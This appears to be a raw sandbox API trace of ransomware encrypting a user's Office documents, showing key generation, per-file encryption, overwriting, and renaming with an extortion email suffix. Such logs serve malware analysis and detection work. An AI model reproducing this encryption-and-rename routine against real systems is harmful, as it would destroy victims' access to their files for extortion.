	[0099.870] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x8344, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x8344, lpOverlapped=0x0) returned 1
	[0099.870] SetFilePointer (in: hFile=0x380, lDistanceToMove=-33604, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.870] WriteFile (in: hFile=0x380, lpBuffer=0x609f08*, nNumberOfBytesToWrite=0x8344, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609f08*, lpNumberOfBytesWritten=0x3a1f778*=0x8344, lpOverlapped=0x0) returned 1
	[0099.872] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.872] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.872] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Vxw-U_YhLo9.xlsx", dwFileAttributes=0x80) returned 1
	[0099.872] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Vxw-U_YhLo9.xlsx") returned 57
	[0099.872] GetProcessHeap () returned 0x540000
	[0099.872] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd8) returned 0x598b60
	[0099.872] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Vxw-U_YhLo9.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Vxw-U_YhLo9.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Vxw-U_YhLo9.xlsx"
	[0099.872] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Vxw-U_YhLo9.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Vxw-U_YhLo9.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Vxw-U_YhLo9.xlsx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.872] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Vxw-U_YhLo9.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vxw-u_yhlo9.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Vxw-U_YhLo9.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vxw-u_yhlo9.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.875] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Vxw-U_YhLo9.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vxw-u_yhlo9.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.875] GetProcessHeap () returned 0x540000
	[0099.875] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.875] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=81944) returned 1
	[0099.875] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x14018
	[0099.875] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.875] GetProcessHeap () returned 0x540000
	[0099.875] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.875] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.876] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.876] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.876] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x14018) returned 0x601bb8
	[0099.877] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x14018) returned 0x3790048
	[0099.877] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.877] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x14018, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x14018, lpOverlapped=0x0) returned 1
	[0099.879] SetFilePointer (in: hFile=0x380, lDistanceToMove=-81944, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.879] WriteFile (in: hFile=0x380, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0x14018, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0x14018, lpOverlapped=0x0) returned 1
	[0099.879] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.880] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.880] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vKdtw4uWXxCy7P.pptx", dwFileAttributes=0x80) returned 1
	[0099.880] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vKdtw4uWXxCy7P.pptx") returned 60
	[0099.880] GetProcessHeap () returned 0x540000
	[0099.880] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xde) returned 0x598b60
	[0099.880] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vKdtw4uWXxCy7P.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vKdtw4uWXxCy7P.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vKdtw4uWXxCy7P.pptx"
	[0099.880] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vKdtw4uWXxCy7P.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vKdtw4uWXxCy7P.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vKdtw4uWXxCy7P.pptx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.880] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vKdtw4uWXxCy7P.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vkdtw4uwxxcy7p.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vKdtw4uWXxCy7P.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vkdtw4uwxxcy7p.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.884] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vKdtw4uWXxCy7P.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vkdtw4uwxxcy7p.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.884] GetProcessHeap () returned 0x540000
	[0099.884] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.884] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=7528) returned 1
	[0099.884] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1d68
	[0099.884] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.884] GetProcessHeap () returned 0x540000
	[0099.884] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.884] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.884] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.885] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.885] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.885] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1d68) returned 0x601bb8
	[0099.885] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1d68) returned 0x603928
	[0099.885] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.885] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x1d68, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x1d68, lpOverlapped=0x0) returned 1
	[0099.885] SetFilePointer (in: hFile=0x380, lDistanceToMove=-7528, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.885] WriteFile (in: hFile=0x380, lpBuffer=0x603928*, nNumberOfBytesToWrite=0x1d68, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x603928*, lpNumberOfBytesWritten=0x3a1f778*=0x1d68, lpOverlapped=0x0) returned 1
	[0099.885] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.885] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.886] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VGTa.xlsx", dwFileAttributes=0x80) returned 1
	[0099.886] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VGTa.xlsx") returned 50
	[0099.886] GetProcessHeap () returned 0x540000
	[0099.886] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xca) returned 0x59d258
	[0099.886] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VGTa.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VGTa.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VGTa.xlsx"
	[0099.886] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VGTa.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VGTa.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VGTa.xlsx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.886] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VGTa.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vgta.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VGTa.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vgta.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.889] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VGTa.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vgta.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.889] GetProcessHeap () returned 0x540000
	[0099.889] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0099.889] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=13093) returned 1
	[0099.889] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x3325
	[0099.889] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.889] GetProcessHeap () returned 0x540000
	[0099.889] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.889] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.889] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.890] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.890] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.890] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x3325) returned 0x601bb8
	[0099.890] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x3325) returned 0x604ee8
	[0099.890] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.890] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x3325, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x3325, lpOverlapped=0x0) returned 1
	[0099.890] SetFilePointer (in: hFile=0x380, lDistanceToMove=-13093, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.891] WriteFile (in: hFile=0x380, lpBuffer=0x604ee8*, nNumberOfBytesToWrite=0x3325, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x604ee8*, lpNumberOfBytesWritten=0x3a1f778*=0x3325, lpOverlapped=0x0) returned 1
	[0099.891] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.891] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.891] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U84ZLgY39Eff.docx", dwFileAttributes=0x80) returned 1
	[0099.891] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U84ZLgY39Eff.docx") returned 58
	[0099.891] GetProcessHeap () returned 0x540000
	[0099.891] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xda) returned 0x598b60
	[0099.891] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U84ZLgY39Eff.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U84ZLgY39Eff.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U84ZLgY39Eff.docx"
	[0099.891] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U84ZLgY39Eff.docx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U84ZLgY39Eff.docx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U84ZLgY39Eff.docx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.891] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U84ZLgY39Eff.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u84zlgy39eff.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U84ZLgY39Eff.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u84zlgy39eff.docx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.893] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U84ZLgY39Eff.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u84zlgy39eff.docx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.893] GetProcessHeap () returned 0x540000
	[0099.893] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.893] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=58377) returned 1
	[0099.893] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xe409
	[0099.893] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.893] GetProcessHeap () returned 0x540000
	[0099.893] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.894] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.894] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.894] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.894] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.895] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0xe409, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0xe409, lpOverlapped=0x0) returned 1
	[0099.895] SetFilePointer (in: hFile=0x380, lDistanceToMove=-58377, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.896] WriteFile (in: hFile=0x380, lpBuffer=0x60ffd0*, nNumberOfBytesToWrite=0xe409, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60ffd0*, lpNumberOfBytesWritten=0x3a1f778*=0xe409, lpOverlapped=0x0) returned 1
	[0099.897] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.897] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.897] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SQYRtKqdVj.xls", dwFileAttributes=0x80) returned 1
	[0099.897] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SQYRtKqdVj.xls") returned 55
	[0099.897] GetProcessHeap () returned 0x540000
	[0099.897] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4) returned 0x598b60
	[0099.897] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SQYRtKqdVj.xls" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SQYRtKqdVj.xls") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SQYRtKqdVj.xls"
	[0099.897] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SQYRtKqdVj.xls", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SQYRtKqdVj.xls.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SQYRtKqdVj.xls.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.897] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SQYRtKqdVj.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sqyrtkqdvj.xls"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SQYRtKqdVj.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sqyrtkqdvj.xls.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.900] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SQYRtKqdVj.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sqyrtkqdvj.xls.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.900] GetProcessHeap () returned 0x540000
	[0099.900] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.900] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=77135) returned 1
	[0099.900] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x12d4f
	[0099.900] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.900] GetProcessHeap () returned 0x540000
	[0099.900] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.900] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.900] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.901] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.901] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
